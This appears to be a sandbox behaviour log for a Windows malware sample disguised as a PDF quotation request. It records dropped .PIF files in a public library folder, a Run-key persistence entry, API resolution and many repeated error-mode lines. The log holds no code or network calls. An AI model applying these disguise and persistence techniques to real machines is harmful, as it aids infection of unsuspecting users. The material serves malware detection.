                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeFile created: \rtd20241038ii listed parts and quotation request ,pdf.scr.exeJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeFile created: C:\Users\Public\Libraries\kmtqwssC.pifJump to dropped file
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeFile created: C:\Users\Public\Libraries\Csswqtmk.PIFJump to dropped file
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CsswqtmkJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CsswqtmkJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_0296A95C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0296A95C
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
